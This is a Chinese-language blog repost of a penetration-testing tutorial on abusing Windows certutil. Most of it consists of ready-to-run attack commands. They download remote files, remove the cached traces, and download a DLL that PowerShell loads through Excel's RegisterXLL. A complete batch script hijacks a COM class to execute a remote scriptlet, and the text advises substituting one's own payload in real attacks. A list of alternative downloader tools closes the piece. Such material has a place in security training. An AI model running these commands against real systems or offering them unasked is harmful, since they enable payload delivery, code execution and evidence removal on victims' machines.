當(dāng)前位置：首頁(yè) > 编程资源 > 综合教程 >内容正文

综合教程

certutil在渗透测测试中的使用技巧

發(fā)布時(shí)間：2023/12/13 综合教程 31 生活家

生活随笔收集整理的這篇文章主要介紹了 certutil在渗透测测试中的使用技巧小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

certutil在滲透測(cè)測(cè)試中的使用技巧

0x01 前言

最近在Casey Smith‏ @subTee的twitter上學(xué)到了關(guān)于certutil的一些利用技巧。本文將結(jié)合自己的一些經(jīng)驗(yàn)，介紹certutil在滲透測(cè)試中的應(yīng)用，對(duì)cmd下downloader的實(shí)現(xiàn)方法作補(bǔ)充。

0x02 certutil簡(jiǎn)介

用于備份證書服務(wù)管理,支持xp-win10

更多操作說(shuō)明見(jiàn)https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx

0x03 滲透測(cè)試中的應(yīng)用

1、downloader

(1) 保存在當(dāng)前路徑，文件名稱和下載文件名稱相同

certutil  -urlcache  -split  -f  https://github.com/backlion/demo/blob/master/weblogic.py

(2) 保存在當(dāng)前路徑，指定保存文件名稱

certutil  -urlcache  -split  -f   https://github.com/backlion/demo/blob/master/weblogic.py  test.py

(3) 保存在緩存目錄，名稱隨機(jī)

緩存目錄位置：%USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent

certutil  -urlcache   -f   https://github.com/backlion/demo/blob/master/weblogic.py

2、清除下載文件副本方法

（1）方法一，直接刪除緩存目錄對(duì)應(yīng)文件

如下圖:

（2）方法二，命令行:

certutil  -urlcache   -f   https://github.com/backlion/demo/blob/master/weblogic.py delete

（3）補(bǔ)充：

查看緩存項(xiàng)目：

certutil.exe -urlcache *

如下圖

3、實(shí)際測(cè)試

(1) powershell中的利用

測(cè)試系統(tǒng)安裝Office軟件，下載執(zhí)行dll對(duì)應(yīng)的powershell代碼如下：

$path="D:	estmsg1.dll"

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll  $path

$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))

$excel.RegisterXLL($path)

測(cè)試如下圖

(2) 下載劫持com的sct的批處理文件

test.bat(這里批處理是利用到certutil下載sct文件劫持com彈出計(jì)算器）：

@echo off

reg add HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00 /ve /t REG_SZ /d Bandit /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesBandit /ve /t REG_SZ /d Bandit /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesBanditCLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC} /ve /t REG_SZ /d Bandit /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}InprocServer32 /ve /t REG_SZ /d C:WINDOWSsystem32scrobj.dll /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}InprocServer32 /v ThreadingModel  /t REG_SZ /d Apartment /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}ProgID /ve /t REG_SZ /d Bandit.1.00 /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}ScriptletURL /ve /t REG_SZ /d https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC}VersionIndependentProgID /ve /t REG_SZ /d Bandit /f 1>nul 2>&1

reg add HKEY_CURRENT_USERSOFTWAREClassesCLSID{372FCE38-4324-11D0-8810-00A0C903B83C}TreatAs /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

certutil 1>nul 2>&1

reg delete HKEY_CURRENT_USERSOFTWAREClassesBandit.1.00 /f 1>nul 2>&1

reg delete HKEY_CURRENT_USERSOFTWAREClassesBandit /f 1>nul 2>&1

reg delete HKEY_CURRENT_USERSOFTWAREClassesCLSID{00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1

reg delete HKEY_CURRENT_USERSOFTWAREClassesCLSID{372FCE38-4324-11D0-8810-00A0C903B83C}TreatAs /f 1>nul 2>&1

echo Done!

這里測(cè)試的test.scr:

注意：在實(shí)戰(zhàn)中需要替換該批處理文件中地址:

https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct為你自己需要的sct（劫持com）文件

運(yùn)行批處理如下：

4、計(jì)算文件hash

(1) SHA1

certutil  -hashfile msg1.dll

(2) SHA256：

certutil  -hashfile msg1.dll SHA256

(3) MD5：

certutil  -hashfile msg1.dll MD5

5、base64編碼轉(zhuǎn)換

(1) base64編碼：

CertUtil -encode InFile OutFile

(2) base64解碼

CertUtil -decode InFile OutFile

注：

編碼后的文件會(huì)添加兩處標(biāo)識(shí)信息：

文件頭：

-----BEGIN CERTIFICATE-----

文件尾：

-----END CERTIFICATE-----

如下圖

0x04 downloader常用方法

常用的cmd下downloader方法，相比來(lái)說(shuō)，利用certUtil簡(jiǎn)便快捷，但是使用后需要注意清除緩存，路徑如下：

%USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent

downloader常用方法如下：

· certUtil

· powershell

· csc

· vbs

· JScript

· hta

· bitsadmin

· wget

· debug

· ftp

· ftfp

0x05 小結(jié)

本文介紹了certutil在滲透測(cè)試中的應(yīng)用，詳細(xì)介紹利用certutil作downloader的實(shí)現(xiàn)方法和檢測(cè)方法

轉(zhuǎn)載引用來(lái)自于：https://3gstudent.github.io

總結(jié)

以上是生活随笔為你收集整理的certutil在渗透测测试中的使用技巧的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： HOJ 2651
下一篇： R语言与医学统计图形【4】直方图、金字塔